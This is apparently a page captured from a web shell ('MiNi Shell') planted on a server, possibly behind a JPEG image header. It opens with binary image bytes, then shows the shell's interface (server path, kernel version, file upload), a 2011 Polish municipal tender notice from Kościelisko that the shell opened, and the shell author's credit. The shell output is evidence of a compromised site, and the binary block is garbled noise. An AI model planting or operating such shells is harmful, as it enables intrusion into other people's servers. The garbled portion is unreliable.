JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110223/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110223/62051-N-2011.html

<p class="kh_header"><b>Kościelisko: Sporządzanie projektów decyzji o warunkach zabudowy i zagospodarowania terenu 
oraz projektów decyzji o ustaleniu lokalizacji inwestycji celu publicznego.</b><br>
<b>Numer ogłoszenia: 62051 - 2011; data zamieszczenia: 23.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kościelisko , ul. Strzelców Podhalańskich 44, 34-511 Kościelisko, woj. małopolskie, tel. 018 2079100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koscielisko.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sporządzanie projektów decyzji o warunkach zabudowy i zagospodarowania terenu 
oraz projektów decyzji o ustaleniu lokalizacji inwestycji celu publicznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sukcesywne, według potrzeb zamawiającego, przygotowywanie:

CZĘŚĆ I - projektów decyzji o warunkach zabudowy i zagospodarowania terenu
	w rozumieniu art. 4 ust. 2 pkt. 1 i pkt 2 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu                 	przestrzennym (Dz. U. z 2003 r. Nr 80, poz. 717 z późn. zm.) 

	Zakres czynności projektanta decyzji wynika z treści Rozdziału 5 ustawy z dnia 27 marca 2003 r. o planowaniu 	i zagospodarowaniu przestrzennym (Dz. U. z 2003 r. Nr 80, poz. 717 z późn. zm.), w szczególności obejmuje:
1.	sporządzanie projektów decyzji o ustaleniu lokalizacji inwestycji celu publicznego w oparciu o przepisy ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003 r. Nr 80, poz. 717 z późn. zm.) i ustawy z dnia 14 czerwca 1960 r. Kodeksu postępowania administracyjnego                     (Dz. U. z 2000 r. Nr 98 poz. 1071 z późn. zm.) oraz zgodnie z przepisami innych ustaw i przepisami szcze-gólnymi z nich wynikającymi ,
2.	sporządzanie analiz urbanistycznych zgodnie z art. 53 ust. 3 ustawy o planowaniu i zagospodarowaniu przestrzennym oraz § 3 rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie spo-sobu ustalania wymagań dotyczących nowej zabudowy i zagospodarowania trenu w przypadku braku miejscowego planu zagospodarowania przestrzennego,
3.	uczestnictwo w procedurze administracyjnej: sprawdzenie wniosku pod względem kompletności, przy-gotowanie niezbędnej korespondencji, w tym: sporządzanie projektów zawiadomień, ustalenie stron po-stępowania administracyjnego, sporządzenie projektów wystąpień o opinie i uzgodnienia wraz z roz-dzielnikiem, wprowadzanie zmian do projektu decyzji na skutek uwzględnienia opinii i uzgodnień orga-nów uzgadniających jak również w wyniku rozpatrzenia uwag zgłoszonych przez Zamawiającego oraz przez strony postępowania, udział w rozprawach administracyjnych ( w zależności od potrzeby), w przypadku odwołań od decyzji udzielanie merytorycznych wyjaśnień, przygotowanie innych pism i wy-jaśnień sporządzanych w związku z prowadzoną procedurą wydawania decyzji.
4.	Opracowanie kompletnej decyzji o odmowie ustalenia warunków zabudowy będzie również uważane za wykonanie przedmiotu zamówienia,
	
		Za ukończenie prac nad projektem decyzji rozumie się termin przyjęcia kompletnych projektów decyzji              		według spisanego protokołu odbioru. Dokumentacja dla Zamawiającego powinna zawierać:
		-   każdy projekt decyzji musi zawierać część tekstową i część graficzną oraz analizę urbanistyczną zawierają-		      cą część tekstową i część graficzną,
		-   każdy projekt decyzji musi być dostarczony na nośniku elektronicznym (płytka CD lub DVD w formatach 		   Word, PDF, rysunki : JPG, TIF, Corel) oraz w formie papierowej w 1 egzemplarzu

	Przewidywana ilość projektów decyzji wzizt w terminie realizacji zamówienia - 8. 
	Ilość faktycznie zleconych do wykonania projektów decyzji może ulec zmianie, gdyż będzie uzależniona od 	bieżących potrzeb Zamawiającego. Wobec tego Zamawiający zastrzega sobie prawo do zmniejszenia zakresu             	realizacji umowy (ilości zlecanych projektów decyzji), przy zachowaniu ceny jednostkowej określonej przez             	Wykonawcę w ofercie.  


CZĘŚĆ II - projektów decyzji o ustaleniu lokalizacji inwestycji celu publicznego
	w rozumieniu art. 4 ust. 2 pkt. 1 i pkt 2 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu             	przestrzennym (Dz. U. z 2003 r. Nr 80, poz. 717 z późn. zm.) 
	
	Zakres czynności projektanta decyzji wynika z treści Rozdziału 5 ustawy z dnia 27 marca 2003 r. o planowaniu 	i zagospodarowaniu przestrzennym (Dz. U. z 2003 r. Nr 80, poz. 717 z późn. zm.), w szczególności obejmuje:
1.	sporządzanie projektów decyzji o ustaleniu lokalizacji inwestycji celu publicznego w oparciu o przepisy usta-wy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2003 r. Nr 80, poz. 717 z późn. zm.) i ustawy z dnia 14 czerwca 1960 r. Kodeksu postępowania administracyjnego (Dz. U. z 2000 r. Nr 98 poz. 1071 z późn. zm.) oraz zgodnie z przepisami innych ustaw i przepisami szczególnymi z nich wynika-jącymi ,
2.	sporządzanie analiz urbanistycznych zgodnie z art. 53 ust. 3 ustawy o planowaniu i zagospodarowaniu prze-strzennym oraz § 3 rozporządzenia Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie sposobu usta-lania wymagań dotyczących nowej zabudowy i zagospodarowania trenu w przypadku braku miejscowego planu zagospodarowania przestrzennego,
3.	uczestnictwo w procedurze administracyjnej: sprawdzenie wniosku pod względem kompletności, przygoto-wanie niezbędnej korespondencji, w tym: sporządzanie projektów zawiadomień, ustalenie stron postępowa-nia administracyjnego, sporządzenie projektów wystąpień o opinie i uzgodnienia wraz z rozdzielnikiem, wprowadzanie zmian do projektu decyzji na skutek uwzględnienia opinii i uzgodnień organów uzgadniają-cych jak również w wyniku rozpatrzenia uwag zgłoszonych przez Zamawiającego oraz przez strony postę-powania, udział w rozprawach administracyjnych ( w zależności od potrzeby), w przypadku odwołań od de-cyzji udzielanie merytorycznych wyjaśnień, przygotowanie innych pism i wyjaśnień sporządzanych                       w związku z prowadzoną procedurą wydawania decyzji.
4.	Opracowanie kompletnej decyzji o odmowie ustalenia warunków zabudowy będzie również uważane                za wykonanie przedmiotu zamówienia,
		
		Za ukończenie prac nad projektem decyzji rozumie się termin przyjęcia kompletnych projektów decyzji               		według spisanego protokołu odbioru. Dokumentacja dla Zamawiającego powinna zawierać:
		-   każdy projekt decyzji musi zawierać część tekstową i część graficzną oraz analizę urbanistyczną zawierają-		      cą część tekstową i część graficzną,
		-   każdy projekt decyzji musi być dostarczony na nośniku elektronicznym (płytka CD lub DVD w formatach 		   Word, PDF, rysunki : JPG, TIF, Corel) oraz w formie papierowej w 1 egzemplarzu.

	Przewidywana ilość projektów decyzji o ustaleniu lokalizacji inwestycji celu publicznego w terminie realizacji 	zamówienia - 2. 
	Ilość faktycznie zleconych do wykonania projektów decyzji może ulec zmianie, gdyż będzie uzależniona od bieżą-	cych potrzeb Zamawiającego. Wobec tego Zamawiający zastrzega sobie prawo do zmniejszenia zakresu realizacji 	umowy (ilości zlecanych projektów decyzji), przy zachowaniu ceny jednostkowej określonej przez Wykonawcę             	w ofercie.  
	

	CPV 71400000-2 - Usługi architektoniczne dotyczące planowania przestrzennego i zagospodarowania terenu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Świdaczenie usług z zakresu sporządzania projektów decyzji o warunkach zabudowy i zagospodarowania terenu w rozumieniu art. 4 ust. 2 pkt. 1 i pkt 2 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu                przestrzennym (Dz. U. z 2003 r. Nr 80, poz. 717 z późn. zm.) praz projektów decyzji o ustaleniu lokalizacji inwestycji celu publicznego
	w rozumieniu art. 4 ust. 2 pkt. 1 i pkt 2 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu             	przestrzennym (Dz. U. z 2003 r. Nr 80, poz. 717 z późn. zm.)</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.40.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Namawiający niw wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia. Wykonawca spełni ww. warunek jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy Pzp, według wzo-ru stanowiące-go załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia. Wykonawca spełni ww. warunek jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy Pzp, według wzo-ru stanowiące-go załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia. Wykonawca spełni ww. warunek jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy Pzp, według wzo-ru stanowiące-go załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia Wykonawca spełni ww. warunek jeżeli złoży oświadczenie że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają uprawnienia zgodne z art. 50 ust. 4 oraz art. 60 ust. 4 ustawy z dnia 27 marca 2003r. o  planowaniu i zagospodarowaniu               	przestrzennym,  według wzoru stanowiącego załącznik nr  4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą spełnia-nie spełnia. Wykonawca spełni ww. warunek jeżeli złoży oświadczenie o spełnianiu warunków zgodnie z art. 22 ust. 1 ustawy Pzp, według wzo-ru stanowiące-go załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne postanowienia zawarte są w projekcie umowy stanowiącym załącznik nr 5 do SIWZ.
2.	Przyjęcie warunków przetargu przez Wykonawcę jest jednoznaczne z przyjęciem warunków umowy proponowanych przez Zamawiającego.
3.	Postanowienia zawarte w projekcie umowy mogą ulec zmianie w następujących przypadkach:
1)	W przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili wyboru najkorzystniej-szej oferty.
2)	W przypadku gdy opracowanie zmiany dla poszczególnych zadań stanie się nie możliwe względu na wobec zaistnienia uprzednio nie przewidzianych okoliczności.
3)	W przypadku zmiany danych teleadresowych, osób reprezentujących firmę, kluczowych specjalistów - na wniosek Zamawiającego lub Wykonawcy.
4)	W przypadku zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy.
5)	W przypadku przedłużenia procedur administracyjnych na etapie wydawania opinii, uzgodnień, postanowień i decyzji administracyjnych.
6)	Na skutek działania siły wyższej, zdarzeń losowych oraz działań władz i organów Państwa;
7)	W przypadku zmiany stawki podatku VAT.
8)	 W przypadku gdy zmiany treści umowy są korzystne dla Zamawiającego a Wykonawca nie wyrazi sprzeciwu   co do  wprowadzenia tych zmian.
4.	Zmiany umowy nie mogą być dokonywane w stosunku do kryteriów, które były oceniane w postępowaniu przetar-gowym</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koscielisko.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kościelisko ul. Strzelaców Podhalańskich 44, 34-511 Kościelisko, pok nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.03.2011 godzina 10:00, miejsce: Urząd Gminy Kościelisko ul. Strzelaców Podhalańskich 44, 34-511 Kościelisko, pok nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com